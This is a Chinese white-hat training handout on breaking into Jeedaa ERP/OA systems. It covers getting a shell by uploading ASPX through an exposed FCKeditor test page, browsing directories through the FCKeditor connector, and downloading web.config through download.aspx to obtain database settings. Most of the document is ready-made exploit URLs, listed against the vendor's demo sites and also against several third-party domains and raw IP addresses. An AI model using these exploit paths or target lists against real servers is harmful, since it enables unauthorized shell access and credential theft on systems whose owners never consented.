米斯特白帽培训讲义(v2)实战篇 捷达系统
2017-03-14 本文已影响92人
布客飞龙
米斯特白帽培训讲义 实战篇 捷达系统
讲师:gh0stkey
整理:飞龙
概述
主要产品有:
- 捷达ERP
- 捷达OA
- 捷达eHR
- 捷达CRM
- 捷达eFax
- 捷达仓库管理
- 捷达进销存.Net
- 捷达协同办公.Net
均存在能够 GetShell 的漏洞。
这个东西仍旧是闭源的,我们使用它的演示站点,http://demoerp.jeedaa.com来进行演示。
文件上传
我们用御剑扫一扫。
出现了 FCKEditer。我们访问/fckeditor,发现是 403 的。
但是我们扫描/fckeditor/fckeditor:
发现有三个 200。我们访问/fckeditor/fckeditor/editor/filemanager/upload/test.html:
我们在查看元素里面添加一个 ASPX,然后随便上传一个 ASP 文件上去。获得了该文件的链接。
部分案例(均为捷达的演示站点):
http://erp2008v4.jeedaa.com/fckeditor/FCKeditor/editor/filemanager/upload/test.htmlhttp://erp.jeedaa.com/fckeditor/FCKeditor/editor/filemanager/upload/test.htmlhttp://qd.jeedaa.net//fckeditor/FCKeditor/editor/filemanager/upload/test.htmlhttp://oa.jeedaa.com/fckeditor/FCKeditor/editor/filemanager/upload/test.htmlhttp://demoerp.jeedaa.com/fckeditor/FCKeditor/editor/filemanager/upload/test.htmlhttp://crm.jeedaa.com/fckeditor/FCKeditor/editor/filemanager/upload/test.htmlhttp://shijia.jeedaa.com/fckeditor/FCKeditor/editor/filemanager/upload/test.htmlhttp://lg.jeedaa.com/fckeditor/FCKeditor/editor/filemanager/upload/test.htmlhttp://hj.jeedaa.com/fckeditor/FCKeditor/editor/filemanager/upload/test.html
目录遍历
访问/fckeditor/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=E:/&CurrentFolder=%2F
可以改动CurrentFolder参数来进入子目录,也可以改动Type参数来切换盘符。
文件下载
访问/WebApp/PassportService/download.aspx?p=/AccreditAdmin/Web.config下载数据库文件:
部分案例:
http://221.136.81.169/WebApp/PassportService/download.aspx?p=web.confighttp://61.164.170.82:88/WebApp/PassportService/download.aspx?p=web.confighttp://www.nbjyly.com/WebApp/PassportService/download.aspx?p=web.confighttp://oa.jobgroup.cn:2013/WebApp/PassportService/download.aspx?p=web.confighttp://erp2008v4.jeedaa.com/WebApp/PassportService/download.aspx?p=web.confighttp://erp.jeedaa.com/WebApp/PassportService/download.aspx?p=web.confighttp://qd.jeedaa.net//WebApp/PassportService/download.aspx?p=web.confighttp://61.130.104.162:8080/WebApp/PassportService/download.aspx?p=web.confighttp://oa.jeedaa.com/WebApp/PassportService/download.aspx?p=web.confighttp://demoerp.jeedaa.com/WebApp/PassportService/download.aspx?p=web.confighttp://crm.jeedaa.com/WebApp/PassportService/download.aspx?p=web.confighttp://shijia.jeedaa.com/WebApp/PassportService/download.aspx?p=web.confighttp://lg.jeedaa.com/WebApp/PassportService/download.aspx?p=web.confighttp://hj.jeedaa.com/WebApp/PassportService/download.aspx?p=web.confighttp://oa.nbself.com/WebApp/PassportService/download.aspx?p=web.confighttp://61.164.170.82:88/WebApp/PassportService/download.aspx?p=web.config
